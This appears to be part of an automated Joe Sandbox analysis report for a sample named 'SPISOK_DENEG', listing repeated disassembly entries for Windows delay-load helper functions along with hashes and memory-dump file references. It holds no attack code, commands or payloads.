                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ddf77b4e447e1b69276c719a85e8c0edd1a8fb600e1d70b64ae67b082197cef8
                                                            • Instruction ID: 1d69db597a4818047179b305e019c5829e8c1a16fbfb124124da8b2c28d254e4
                                                            • Opcode Fuzzy Hash: ddf77b4e447e1b69276c719a85e8c0edd1a8fb600e1d70b64ae67b082197cef8
                                                            • Instruction Fuzzy Hash: 2AB012D22598C47CF118520A9F02D3F090CC2C5F10730812EF458E41C1EE810C450871
                                                            Function 000EE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE51F
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9a36601c0f958ae20a34ba4c9a7f8d642e3b70586a97eeeb4650d5c0335209b6
                                                            • Instruction ID: 25a577c7f10625bb15f0d7921601bc83ecab9df257d3ccd9b72680862e9e1c47
                                                            • Opcode Fuzzy Hash: 9a36601c0f958ae20a34ba4c9a7f8d642e3b70586a97eeeb4650d5c0335209b6
                                                            • Instruction Fuzzy Hash: 2DB012D22599C47DF118520A9F02E3F050CC2C5F10730412EF458E41C1EE800C040871
                                                            Function 000EE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE51F
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: b8f7fffd76518813405466af6cc2014726287cd4f2aa9df2892f27c2f607485e
                                                            • Instruction ID: 8b1624ee2795f9b2820a69feb7e19c71de32855d2b0d3abd8c8658505b5f588c
                                                            • Opcode Fuzzy Hash: b8f7fffd76518813405466af6cc2014726287cd4f2aa9df2892f27c2f607485e
                                                            • Instruction Fuzzy Hash: 0CB012D22599C47CF218520ADE03D3F010CC2C5F11730432EF458E01C1EE800C480875
                                                            Function 000EE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE580
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: fd6091b51b8d41c9bb143a9f0c9c01b1f0678d50b082b4f2c1adf1378ddfd3e8
                                                            • Instruction ID: c71179eaef8d54890a9fd6acc90710aebb1c01a7e676a695238a15b8af1c9d99
                                                            • Opcode Fuzzy Hash: fd6091b51b8d41c9bb143a9f0c9c01b1f0678d50b082b4f2c1adf1378ddfd3e8
                                                            • Instruction Fuzzy Hash: A4B012D22581C87DF11453569E02C3B010CC2C0B10730422FF418E51C1EE800C080875
                                                            Function 000EE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE580
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: b1d90d9868a0fb15966d203b59a773a445cc349469e37293ffb365fa2a01565e
                                                            • Instruction ID: b31211e9aee646cfcc2c0c75126fff77b456234c9fef4c6cbca448dff0dbaf1c
                                                            • Opcode Fuzzy Hash: b1d90d9868a0fb15966d203b59a773a445cc349469e37293ffb365fa2a01565e
                                                            • Instruction Fuzzy Hash: 8EB012D22580C47CF1145356DF02C3B011CC2C0B10730432FF458E11C1EE810D491875
                                                            Function 000EE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE580
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6857192596f259e8dcee782aeddf46281399baf92c94c874af4569bcf36ada6b
                                                            • Instruction ID: e55445886ff7f792d150cb45284225b9479f41fae813c979a5f399043862de7f
                                                            • Opcode Fuzzy Hash: 6857192596f259e8dcee782aeddf46281399baf92c94c874af4569bcf36ada6b
                                                            • Instruction Fuzzy Hash: D0B012D22581C47CF1545356DE03C3B011CC2C0B11730432FF418E11C1EEC00C480875
                                                            Function 000EE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 54473614d1b77f41cde8a1440f1ff11e39a46ddca5bedcbf7d8065b94ec96011
                                                            • Instruction ID: 56aa356f736836bb2c922a973cb65ddf30017e3a4ebaf19f4955f3d3cf0a974c
                                                            • Opcode Fuzzy Hash: 54473614d1b77f41cde8a1440f1ff11e39a46ddca5bedcbf7d8065b94ec96011
                                                            • Instruction Fuzzy Hash: B8A002F52591C5BCB11852539D16C7B011DC5C5B51330856DF856D44C16D9068451C71
                                                            Function 000EE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 664ecc20c9bc7875fb3c8abd1c35ad40608fe01551068811d05fd9c306d256fe
                                                            • Instruction ID: 56aa356f736836bb2c922a973cb65ddf30017e3a4ebaf19f4955f3d3cf0a974c
                                                            • Opcode Fuzzy Hash: 664ecc20c9bc7875fb3c8abd1c35ad40608fe01551068811d05fd9c306d256fe
                                                            • Instruction Fuzzy Hash: B8A002F52591C5BCB11852539D16C7B011DC5C5B51330856DF856D44C16D9068451C71
                                                            Function 000EE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 62acc1a952c7398e2fc6601ae0dc7060e04322f6a9727b4c4891f889a8168915
                                                            • Instruction ID: 56aa356f736836bb2c922a973cb65ddf30017e3a4ebaf19f4955f3d3cf0a974c
                                                            • Opcode Fuzzy Hash: 62acc1a952c7398e2fc6601ae0dc7060e04322f6a9727b4c4891f889a8168915
                                                            • Instruction Fuzzy Hash: B8A002F52591C5BCB11852539D16C7B011DC5C5B51330856DF856D44C16D9068451C71
                                                            Function 000EE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 8db65dc3f7b277aefa935f93d903e9a7aea6c9ccc8b61b5d6293a3342b7ebfa8
                                                            • Instruction ID: 56aa356f736836bb2c922a973cb65ddf30017e3a4ebaf19f4955f3d3cf0a974c
                                                            • Opcode Fuzzy Hash: 8db65dc3f7b277aefa935f93d903e9a7aea6c9ccc8b61b5d6293a3342b7ebfa8
                                                            • Instruction Fuzzy Hash: B8A002F52591C5BCB11852539D16C7B011DC5C5B51330856DF856D44C16D9068451C71
                                                            Function 000EE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 89b1766cfb458767d8aee52b02137f01278a80a2183098b02e392d314f585814
                                                            • Instruction ID: 56aa356f736836bb2c922a973cb65ddf30017e3a4ebaf19f4955f3d3cf0a974c
                                                            • Opcode Fuzzy Hash: 89b1766cfb458767d8aee52b02137f01278a80a2183098b02e392d314f585814
                                                            • Instruction Fuzzy Hash: B8A002F52591C5BCB11852539D16C7B011DC5C5B51330856DF856D44C16D9068451C71
                                                            Function 000EE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4922b8f1d96ab84e70bcf440a798d0ec5e5f4a8bea470c3a90e8977e6f910e91
                                                            • Instruction ID: 56aa356f736836bb2c922a973cb65ddf30017e3a4ebaf19f4955f3d3cf0a974c
                                                            • Opcode Fuzzy Hash: 4922b8f1d96ab84e70bcf440a798d0ec5e5f4a8bea470c3a90e8977e6f910e91
                                                            • Instruction Fuzzy Hash: B8A002F52591C5BCB11852539D16C7B011DC5C5B51330856DF856D44C16D9068451C71
                                                            Function 000EE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e63541268a708232f7f5a3d786d7cc07ca799f201840d46882357cbecdbc77fa
                                                            • Instruction ID: 56aa356f736836bb2c922a973cb65ddf30017e3a4ebaf19f4955f3d3cf0a974c
                                                            • Opcode Fuzzy Hash: e63541268a708232f7f5a3d786d7cc07ca799f201840d46882357cbecdbc77fa
                                                            • Instruction Fuzzy Hash: B8A002F52591C5BCB11852539D16C7B011DC5C5B51330856DF856D44C16D9068451C71
                                                            Function 000EE2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d67b4094c6e49eacc0262c9b2d0d303704fce69e78fb3c0e0ac047d1d2548c50
                                                            • Instruction ID: 56aa356f736836bb2c922a973cb65ddf30017e3a4ebaf19f4955f3d3cf0a974c
                                                            • Opcode Fuzzy Hash: d67b4094c6e49eacc0262c9b2d0d303704fce69e78fb3c0e0ac047d1d2548c50
                                                            • Instruction Fuzzy Hash: B8A002F52591C5BCB11852539D16C7B011DC5C5B51330856DF856D44C16D9068451C71
                                                            Function 000EE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 235aeae874949207448c487c14c9a6bdbfaf749e48ba7dd39262692114bbec97
                                                            • Instruction ID: 56aa356f736836bb2c922a973cb65ddf30017e3a4ebaf19f4955f3d3cf0a974c
                                                            • Opcode Fuzzy Hash: 235aeae874949207448c487c14c9a6bdbfaf749e48ba7dd39262692114bbec97
                                                            • Instruction Fuzzy Hash: B8A002F52591C5BCB11852539D16C7B011DC5C5B51330856DF856D44C16D9068451C71
                                                            Function 000EE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
